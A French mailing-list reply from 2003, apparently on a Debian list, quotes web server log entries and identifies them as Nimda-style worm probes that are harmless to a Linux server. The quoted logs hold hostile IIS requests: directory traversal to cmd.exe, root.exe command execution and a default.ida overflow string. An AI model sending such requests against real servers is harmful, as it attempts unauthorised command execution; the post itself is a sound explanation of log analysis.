Le Wed, 15 Jan 2003 11:45:52 +0100, dans son impérissable log server web, Loïc Le Guyader <[EMAIL PROTECTED]> écrivait :
|> xxx.xxx.xxx.xxx - - [14/Jan/2003:14:05:54 +0100] "GET |> /scripts/root.exe?/c+dir HTTP/ 1.0" 404 0 "" "" |> xxx.xxx.xxx.xxx - - [14/Jan/2003:14:05:56 +0100] "GET |> /scripts/..%255c../winnt/syste m32/cmd.exe?/c+dir HTTP/1.0" 404 0 "" |> "" xxx.xxx.xxx.xxx - - [14/Jan/2003:14:05:58 +0100] "GET |> /msadc/..%255c../..%255c../..% |> 255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir |> HTTP/1.0" 40 4 0 "" "" |> xxx.xxx.xxx.xxx - - [14/Jan/2003:20:33:12 +0100] "GET |> /default.ida?NNNNNNNNNNNNNNN |> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN |> NNNNNNNNNNNN |> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN |> NNNNNNNNNNNN NNNNNNNNNNNN HTTP/1.0" 404 0 "" "" C'est des attaques, mais tu auras du mal pour te plaindre, car le responsable a toute les chances d'être le virus Nimda qui, d'une autre machine vient questionner la tienne. Et comme Winnt/system32/cmd.exe il risque de chercher longtemps chez Debian... Dors tranquille (ZZzzzz...) -- _________ _ ___ ______ * Dominique Marin * /__ ___//| |/ // / \\ * * * http://txodom.free.fr */ // | // / // // * GNU * * [EMAIL PROTECTED] * / // / || / // // * LINUX * * [EMAIL PROTECTED] * /_// /_/|_|| \_____// * DEBIAN *